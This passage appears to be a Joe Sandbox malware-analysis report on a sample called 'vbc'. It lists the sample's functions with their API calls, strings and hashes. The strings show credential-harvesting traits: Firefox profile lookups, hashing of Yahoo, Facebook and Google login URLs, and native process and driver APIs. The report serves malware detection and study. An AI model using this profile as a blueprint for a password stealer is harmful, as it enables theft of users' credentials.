                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FileInfoQueryValueVersion$??2@??3@Size_snwprintfwcscpy
                                                                                                                                                    • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                                                                                                                                                    • API String ID: 1223191525-1542517562
                                                                                                                                                    • Opcode ID: ec9f1750a971676f8f5b87978c60c05f37f633cf3339783e1382760c10002422
                                                                                                                                                    • Instruction ID: 5dc843b0b2888ef0cde47c2e58fd974eed7f8edc5a370bbe46a7031584b3d011
                                                                                                                                                    • Opcode Fuzzy Hash: ec9f1750a971676f8f5b87978c60c05f37f633cf3339783e1382760c10002422
                                                                                                                                                    • Instruction Fuzzy Hash: 044143B2940618BAE704EFA1EC82DDEB7BCFF08744B400557B505A3151DB78BA85CBE8
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040C8CF Relevance: 33.1, APIs: 22, Instructions: 137windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • memset.MSVCRT ref: 0040C912
                                                                                                                                                    • memset.MSVCRT ref: 0040C927
                                                                                                                                                    • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 0040C939
                                                                                                                                                    • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 0040C957
                                                                                                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001), ref: 0040C970
                                                                                                                                                    • ImageList_SetImageCount.COMCTL32(00000000,00000006), ref: 0040C97B
                                                                                                                                                    • SendMessageW.USER32(?,00001003,00000001,?), ref: 0040C994
                                                                                                                                                    • ImageList_Create.COMCTL32(00000020,00000020,00000019,00000001,00000001), ref: 0040C9A8
                                                                                                                                                    • ImageList_SetImageCount.COMCTL32(00000000,00000006), ref: 0040C9B3
                                                                                                                                                    • SendMessageW.USER32(?,00001003,00000000,?), ref: 0040C9CB
                                                                                                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001), ref: 0040C9D7
                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 0040C9E6
                                                                                                                                                    • LoadImageW.USER32 ref: 0040C9F8
                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 0040CA03
                                                                                                                                                    • LoadImageW.USER32 ref: 0040CA15
                                                                                                                                                    • ImageList_SetImageCount.COMCTL32(?,00000000), ref: 0040CA26
                                                                                                                                                    • GetSysColor.USER32(0000000F), ref: 0040CA2E
                                                                                                                                                    • ImageList_AddMasked.COMCTL32(?,00000000,00000000), ref: 0040CA49
                                                                                                                                                    • ImageList_AddMasked.COMCTL32(?,?,?), ref: 0040CA59
                                                                                                                                                    • DeleteObject.GDI32(?), ref: 0040CA65
                                                                                                                                                    • DeleteObject.GDI32(?), ref: 0040CA6B
                                                                                                                                                    • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 0040CA88
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Image$List_$CountCreateMessageSend$DeleteHandleLoadMaskedModuleObjectmemset$ColorDirectoryFileInfoWindows
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 304928396-0
                                                                                                                                                    • Opcode ID: 45911c1970665382fa90db5d41abc719a2ef46b241cbde3be6a9b9b2f588298f
                                                                                                                                                    • Instruction ID: 0a3ff62ab3886bf523a191411b010267208ec01492d8cd9208f2635b8a46902f
                                                                                                                                                    • Opcode Fuzzy Hash: 45911c1970665382fa90db5d41abc719a2ef46b241cbde3be6a9b9b2f588298f
                                                                                                                                                    • Instruction Fuzzy Hash: A541B871640304BFE7209F70CC8AF97B7ACFB09B45F000929F399A51D1C6B5A9408B29
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040648C Relevance: 31.7, APIs: 13, Strings: 5, Instructions: 173registrytimeCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • memset.MSVCRT ref: 004064AD
                                                                                                                                                      • Part of subcall function 00411B67: RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00412303,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,?), ref: 00411B7A
                                                                                                                                                    • _wcsnicmp.MSVCRT ref: 00406520
                                                                                                                                                    • memset.MSVCRT ref: 00406544
                                                                                                                                                    • memset.MSVCRT ref: 00406560
                                                                                                                                                    • _snwprintf.MSVCRT ref: 00406580
                                                                                                                                                    • wcsrchr.MSVCRT ref: 004065A7
                                                                                                                                                    • CompareFileTime.KERNEL32(?,?,00000000), ref: 004065DA
                                                                                                                                                    • wcscpy.MSVCRT ref: 004065FC
                                                                                                                                                    • memset.MSVCRT ref: 004064FA
                                                                                                                                                      • Part of subcall function 00411BFE: RegEnumKeyExW.ADVAPI32(00000000,0040FB38,0040FB38,?,00000000,00000000,00000000,0040FB38,0040FB38,00000000), ref: 00411C21
                                                                                                                                                    • RegCloseKey.ADVAPI32(0040FB38), ref: 00406634
                                                                                                                                                    • wcscpy.MSVCRT ref: 00406642
                                                                                                                                                    • ExpandEnvironmentStringsW.KERNEL32(%programfiles%\Mozilla Firefox,?,00000104,?,?,?,?,00000000,?), ref: 00406659
                                                                                                                                                    • GetCurrentDirectoryW.KERNEL32(00000104,?,?,?,?,?,?,?,00000000,?), ref: 00406695
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: memset$wcscpy$CloseCompareCurrentDirectoryEnumEnvironmentExpandFileOpenStringsTime_snwprintf_wcsnicmpwcsrchr
                                                                                                                                                    • String ID: %programfiles%\Mozilla Firefox$%s\bin$PathToExe$SOFTWARE\Mozilla$mozilla
                                                                                                                                                    • API String ID: 1094916163-2797892316
                                                                                                                                                    • Opcode ID: 6fc1e2e3a791b033bf776d6d93ccb5a8b208ad6747335505a9b79a97a3079406
                                                                                                                                                    • Instruction ID: 63e98d9b0590a06fe0611c8d8f76d67a06a86b9579f74a21c863053dc4382b5e
                                                                                                                                                    • Opcode Fuzzy Hash: 6fc1e2e3a791b033bf776d6d93ccb5a8b208ad6747335505a9b79a97a3079406
                                                                                                                                                    • Instruction Fuzzy Hash: F5515472D00218BAEF20EB61DC45ADFB7BCAF04354F0104A6F905F2191EB799B94CB99
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 004125BA Relevance: 31.6, APIs: 12, Strings: 6, Instructions: 103COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: wcscat$_snwprintfmemset$wcscpy
                                                                                                                                                    • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                                                                                                    • API String ID: 3143752011-1996832678
                                                                                                                                                    • Opcode ID: 2ff61e6e61c45a42ec8a536e31393f15904b361fc50918dfd7b37e2d26dac3f0
                                                                                                                                                    • Instruction ID: 1bdd15307226dc02cd036ffdab734ce65306a7f25c134a46d7f370f8b7d92746
                                                                                                                                                    • Opcode Fuzzy Hash: 2ff61e6e61c45a42ec8a536e31393f15904b361fc50918dfd7b37e2d26dac3f0
                                                                                                                                                    • Instruction Fuzzy Hash: 2C31E9B2900305BEEB20AA559E82DBF73BCDF41715F60405FF214E21C2DABC9E859A1C
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040FC89 Relevance: 31.5, APIs: 9, Strings: 9, Instructions: 41libraryloaderCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,004088B3,?,000000FF,00000000,00000104), ref: 0040FC9C
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 0040FCB3
                                                                                                                                                    • GetProcAddress.KERNEL32(NtLoadDriver), ref: 0040FCC5
                                                                                                                                                    • GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0040FCD7
                                                                                                                                                    • GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0040FCE9
                                                                                                                                                    • GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 0040FCFB
                                                                                                                                                    • GetProcAddress.KERNEL32(NtQueryObject), ref: 0040FD0D
                                                                                                                                                    • GetProcAddress.KERNEL32(NtSuspendProcess), ref: 0040FD1F
                                                                                                                                                    • GetProcAddress.KERNEL32(NtResumeProcess), ref: 0040FD31
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressProc$HandleModule
                                                                                                                                                    • String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll
                                                                                                                                                    • API String ID: 667068680-2887671607
                                                                                                                                                    • Opcode ID: d01a7573c8c1d70ed52b2f6ff8626cb2949720c0675fde4b879603f159105d12
                                                                                                                                                    • Instruction ID: df14504fdc59ccf6a8c55cbe4aacceea24f9204784c5926a31105bf4aba29bc2
                                                                                                                                                    • Opcode Fuzzy Hash: d01a7573c8c1d70ed52b2f6ff8626cb2949720c0675fde4b879603f159105d12
                                                                                                                                                    • Instruction Fuzzy Hash: 8E018478D40314BBEB119F71AC09B563EA9F7187967180977F41862272DBB98810EE8C
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040BEB4 Relevance: 29.9, APIs: 10, Strings: 7, Instructions: 184COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • memset.MSVCRT ref: 0040BED5
                                                                                                                                                    • memset.MSVCRT ref: 0040BEFF
                                                                                                                                                    • memset.MSVCRT ref: 0040BF15
                                                                                                                                                    • memset.MSVCRT ref: 0040BF2B
                                                                                                                                                    • _snwprintf.MSVCRT ref: 0040BF64
                                                                                                                                                    • wcscpy.MSVCRT ref: 0040BFAF
                                                                                                                                                    • _snwprintf.MSVCRT ref: 0040C03C
                                                                                                                                                    • wcscat.MSVCRT ref: 0040C06E
                                                                                                                                                      • Part of subcall function 0041248F: _snwprintf.MSVCRT ref: 004124B3
                                                                                                                                                    • wcscpy.MSVCRT ref: 0040C050
                                                                                                                                                    • _snwprintf.MSVCRT ref: 0040C0AD
                                                                                                                                                      • Part of subcall function 00407176: wcslen.MSVCRT ref: 00407183
                                                                                                                                                      • Part of subcall function 00407176: WriteFile.KERNEL32(00000001,00000000,00000000,00000000,00000000,?,?,0040BC47,00000000,00443980,00000000,0040C656,00000000), ref: 00407192
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _snwprintfmemset$wcscpy$FileWritewcscatwcslen
                                                                                                                                                    • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                                                                                                                    • API String ID: 1277802453-601624466
                                                                                                                                                    • Opcode ID: afbe44f23bf8ba0960694767798beca720d6b7b0fa1b1000d23084d0d272dd1b
                                                                                                                                                    • Instruction ID: c023c2c05774347514c90e9c4a79a5fc261e79551634f2018d74b142c4ca0a41
                                                                                                                                                    • Opcode Fuzzy Hash: afbe44f23bf8ba0960694767798beca720d6b7b0fa1b1000d23084d0d272dd1b
                                                                                                                                                    • Instruction Fuzzy Hash: 6B619E31900208EFEF14EF94CC86EAEBB79EF44314F50419AF905AA1D2DB75AA51CF58
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 004126E8 Relevance: 28.1, APIs: 10, Strings: 6, Instructions: 120COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _snwprintf$memset$wcscpy
                                                                                                                                                    • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                                                                                    • API String ID: 2000436516-3842416460
                                                                                                                                                    • Opcode ID: 226d5b028e445a7516cf64f8fc5c05c3ce0576dee2713dde24e27e7b686f1b2e
                                                                                                                                                    • Instruction ID: df620ac0873104ba588d68bc57a3bc16e82c0a505241d1212890b0a23309d9f4
                                                                                                                                                    • Opcode Fuzzy Hash: 226d5b028e445a7516cf64f8fc5c05c3ce0576dee2713dde24e27e7b686f1b2e
                                                                                                                                                    • Instruction Fuzzy Hash: 03418371D402197AEB20EB55DD41EFB727CFF04304F4401AAB509E2181EB749B948F6A
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 004035E2 Relevance: 27.1, APIs: 18, Instructions: 66windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 0040C8CF: memset.MSVCRT ref: 0040C912
                                                                                                                                                      • Part of subcall function 0040C8CF: memset.MSVCRT ref: 0040C927
                                                                                                                                                      • Part of subcall function 0040C8CF: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 0040C939
                                                                                                                                                      • Part of subcall function 0040C8CF: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 0040C957
                                                                                                                                                      • Part of subcall function 0040C8CF: SendMessageW.USER32(?,00001003,00000001,?), ref: 0040C994
                                                                                                                                                      • Part of subcall function 0040C8CF: ImageList_Create.COMCTL32(00000020,00000020,00000019,00000001,00000001), ref: 0040C9A8
                                                                                                                                                      • Part of subcall function 0040C8CF: ImageList_SetImageCount.COMCTL32(00000000,00000006), ref: 0040C9B3
                                                                                                                                                      • Part of subcall function 0040C8CF: SendMessageW.USER32(?,00001003,00000000,?), ref: 0040C9CB
                                                                                                                                                      • Part of subcall function 0040C8CF: ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001), ref: 0040C9D7
                                                                                                                                                      • Part of subcall function 0040C8CF: GetModuleHandleW.KERNEL32(00000000), ref: 0040C9E6
                                                                                                                                                      • Part of subcall function 0040C8CF: LoadImageW.USER32 ref: 0040C9F8
                                                                                                                                                      • Part of subcall function 0040C8CF: GetModuleHandleW.KERNEL32(00000000), ref: 0040CA03
                                                                                                                                                      • Part of subcall function 0040C8CF: LoadImageW.USER32 ref: 0040CA15
                                                                                                                                                      • Part of subcall function 0040C8CF: ImageList_SetImageCount.COMCTL32(?,00000000), ref: 0040CA26
                                                                                                                                                      • Part of subcall function 0040C8CF: GetSysColor.USER32(0000000F), ref: 0040CA2E
                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 004035F4
                                                                                                                                                    • LoadIconW.USER32(00000000,00000072), ref: 004035FF
                                                                                                                                                    • ImageList_ReplaceIcon.COMCTL32(?,00000000,00000000), ref: 00403610
                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00403614
                                                                                                                                                    • LoadIconW.USER32(00000000,00000074), ref: 00403619
                                                                                                                                                    • ImageList_ReplaceIcon.COMCTL32(?,00000001,00000000), ref: 00403624
                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00403628
                                                                                                                                                    • LoadIconW.USER32(00000000,00000073), ref: 0040362D
                                                                                                                                                    • ImageList_ReplaceIcon.COMCTL32(?,00000002,00000000), ref: 00403638
                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 0040363C
                                                                                                                                                    • LoadIconW.USER32(00000000,00000075), ref: 00403641
                                                                                                                                                    • ImageList_ReplaceIcon.COMCTL32(?,00000003,00000000), ref: 0040364C
                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00403650
                                                                                                                                                    • LoadIconW.USER32(00000000,0000006F), ref: 00403655
                                                                                                                                                    • ImageList_ReplaceIcon.COMCTL32(?,00000004,00000000), ref: 00403660
                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00403664
                                                                                                                                                    • LoadIconW.USER32(00000000,00000076), ref: 00403669
                                                                                                                                                    • ImageList_ReplaceIcon.COMCTL32(?,00000005,00000000), ref: 00403674
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Image$Icon$List_$HandleLoadModule$Replace$CountCreateMessageSendmemset$ColorDirectoryFileInfoWindows
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 792915304-0
                                                                                                                                                    • Opcode ID: cc435ca99fa3c831c04f4257ae775a7279f3e83e44ba77ecb565717d4c2bd910
                                                                                                                                                    • Instruction ID: 62ec96a61e35675a05b55f01cd8090f0511f6faf4d41b9404683e1d7d0c62212
                                                                                                                                                    • Opcode Fuzzy Hash: cc435ca99fa3c831c04f4257ae775a7279f3e83e44ba77ecb565717d4c2bd910
                                                                                                                                                    • Instruction Fuzzy Hash: 6901E1A17957087AF53137B2EC4BF6B7B5EDF81F4AF214414F30C990E0C9A6AD105928
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00406B9F Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 174stringCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00407144: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,004421F7,00000000,?,00000000,00000000,00410671,?,?), ref: 00407156
                                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,00000104,00000001,00000000,?,00407052,?,?,?,0000001E), ref: 00406BC8
                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT ref: 00406BDC
                                                                                                                                                      • Part of subcall function 00407B93: ReadFile.KERNELBASE(?,?,5"D,00000000,00000000,?,?,00442235,00000000,00000000), ref: 00407BAA
                                                                                                                                                    • memset.MSVCRT ref: 00406C0B
                                                                                                                                                    • memset.MSVCRT ref: 00406C2B
                                                                                                                                                    • memset.MSVCRT ref: 00406C40
                                                                                                                                                    • strcmp.MSVCRT ref: 00406C64
                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 00406DC3
                                                                                                                                                    • CloseHandle.KERNEL32(Rp@,?,00407052,?,?,?,0000001E), ref: 00406DCC
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Filememset$??2@??3@CloseCreateHandleReadSizestrcmp
                                                                                                                                                    • String ID: ---$Rp@
                                                                                                                                                    • API String ID: 2784192885-2834202798
                                                                                                                                                    • Opcode ID: 94eb7d45b3064e74519a59694890047dd7365216467f7798c66d5ee7b063cd76
                                                                                                                                                    • Instruction ID: 5360a5981a47af023619c2d52a4e150b55de9ab2e9c88b676a0c17dd944fe9c5
                                                                                                                                                    • Opcode Fuzzy Hash: 94eb7d45b3064e74519a59694890047dd7365216467f7798c66d5ee7b063cd76
                                                                                                                                                    • Instruction Fuzzy Hash: 2E51817290815DAAEF21DB558C819DEBBBCEF14304F1040FBE50AA3141DA389FD5DBA9
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040AA44 Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 95COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • memset.MSVCRT ref: 0040AA6A
                                                                                                                                                    • memset.MSVCRT ref: 0040AA86
                                                                                                                                                      • Part of subcall function 0040757A: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040AB83,00000000,0040AA36,?,00000000,00000208,?), ref: 00407585
                                                                                                                                                      • Part of subcall function 00441C15: GetFileVersionInfoSizeW.VERSION(0040AAB8,?,00000000), ref: 00441C2B
                                                                                                                                                      • Part of subcall function 00441C15: ??2@YAPAXI@Z.MSVCRT ref: 00441C46
                                                                                                                                                      • Part of subcall function 00441C15: GetFileVersionInfoW.VERSION(0040AAB8,00000000,?,00000000,00000000,0040AAB8,?,00000000), ref: 00441C56
                                                                                                                                                      • Part of subcall function 00441C15: VerQueryValueW.VERSION(00000000,004482D0,0040AAB8,?,0040AAB8,00000000,?,00000000,00000000,0040AAB8,?,00000000), ref: 00441C69
                                                                                                                                                      • Part of subcall function 00441C15: VerQueryValueW.VERSION(00000000,\VarFileInfo\Translation,?,?,00000000,004482D0,0040AAB8,?,0040AAB8,00000000,?,00000000,00000000,0040AAB8,?,00000000), ref: 00441CA6
                                                                                                                                                      • Part of subcall function 00441C15: _snwprintf.MSVCRT ref: 00441CC6
                                                                                                                                                      • Part of subcall function 00441C15: wcscpy.MSVCRT ref: 00441CF0
                                                                                                                                                    • wcscpy.MSVCRT ref: 0040AACA
                                                                                                                                                    • wcscpy.MSVCRT ref: 0040AAD9
                                                                                                                                                    • wcscpy.MSVCRT ref: 0040AAE9
                                                                                                                                                    • EnumResourceNamesW.KERNEL32(0040ABE8,00000004,0040A818,00000000), ref: 0040AB4E
                                                                                                                                                    • EnumResourceNamesW.KERNEL32(0040ABE8,00000005,0040A818,00000000), ref: 0040AB58
                                                                                                                                                    • wcscpy.MSVCRT ref: 0040AB60
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: wcscpy$File$EnumInfoNamesQueryResourceValueVersionmemset$??2@ModuleNameSize_snwprintf
                                                                                                                                                    • String ID: RTL$TranslatorName$TranslatorURL$Version$general$strings
                                                                                                                                                    • API String ID: 3037099051-517860148
                                                                                                                                                    • Opcode ID: 42bb3ddbac911a4f98fdd80fc46cc1bb05b8c334879e2c61fbf0dcf740b73ed1
                                                                                                                                                    • Instruction ID: 9c0725b1fda07d439eb4652870f5b63d7404026a1df9010dc4cb7dda8e53314a
                                                                                                                                                    • Opcode Fuzzy Hash: 42bb3ddbac911a4f98fdd80fc46cc1bb05b8c334879e2c61fbf0dcf740b73ed1
                                                                                                                                                    • Instruction Fuzzy Hash: 6D21807294021875E720B7529C46ECF7A6CAF40755F90447BF60CB20D2EAB85B948AAE
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 004038C4 Relevance: 24.5, APIs: 7, Strings: 7, Instructions: 33libraryloaderCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • LoadLibraryW.KERNEL32(advapi32.dll,?,00409AAA,?,https://login.yahoo.com/config/login,00000000,http://www.facebook.com/,00000000,https://www.google.com/accounts/servicelogin,00000000,?,00000000,?,0041018E,?,?), ref: 004038CF
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 004038E3
                                                                                                                                                    • GetProcAddress.KERNEL32(?,CryptReleaseContext), ref: 004038EF
                                                                                                                                                    • GetProcAddress.KERNEL32(?,CryptCreateHash), ref: 004038FB
                                                                                                                                                    • GetProcAddress.KERNEL32(?,CryptGetHashParam), ref: 00403907
                                                                                                                                                    • GetProcAddress.KERNEL32(?,CryptHashData), ref: 00403913
                                                                                                                                                    • GetProcAddress.KERNEL32(?,CryptDestroyHash), ref: 0040391F
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressProc$LibraryLoad
                                                                                                                                                    • String ID: CryptAcquireContextA$CryptCreateHash$CryptDestroyHash$CryptGetHashParam$CryptHashData$CryptReleaseContext$advapi32.dll
                                                                                                                                                    • API String ID: 2238633743-1621422469
                                                                                                                                                    • Opcode ID: 1f0e41ba9439715e20e962f0f0f69e7cffe4c0714adecff32c833d06c54dafe9
                                                                                                                                                    • Instruction ID: 1a4948e4bf817cd33749cdf205c6c1bb7532e39c1774f91cd0a649ea1cfd5687
                                                                                                                                                    • Opcode Fuzzy Hash: 1f0e41ba9439715e20e962f0f0f69e7cffe4c0714adecff32c833d06c54dafe9
                                                                                                                                                    • Instruction Fuzzy Hash: 18F0F475940744AAEB30AF769D49E06BEF0EFA8B027218D2EE1C1A3651D7B99240CE44
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00410D5D Relevance: 22.8, APIs: 7, Strings: 6, Instructions: 48libraryloaderCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • LoadLibraryW.KERNEL32(psapi.dll,?,0040F921), ref: 00410D70
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 00410D89
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00410D9A
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 00410DAB
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00410DBC
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 00410DCD
                                                                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 00410DED
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressProc$Library$FreeLoad
                                                                                                                                                    • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                                                                                    • API String ID: 2449869053-70141382
                                                                                                                                                    • Opcode ID: 03c5cb85ec8565a209b0338e2b218e2b3a1591461e747cd833f82df10bd978eb
                                                                                                                                                    • Instruction ID: 1ed5449ad40e57d8b224171af96504b1ffda3ff1f81db88aadee6c58e1c1cdad
                                                                                                                                                    • Opcode Fuzzy Hash: 03c5cb85ec8565a209b0338e2b218e2b3a1591461e747cd833f82df10bd978eb
                                                                                                                                                    • Instruction Fuzzy Hash: BB01B574A45312AEE7109B64FC40BFB2EA4B781B42B20403BE400D1396DBBCD8C29A6C
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

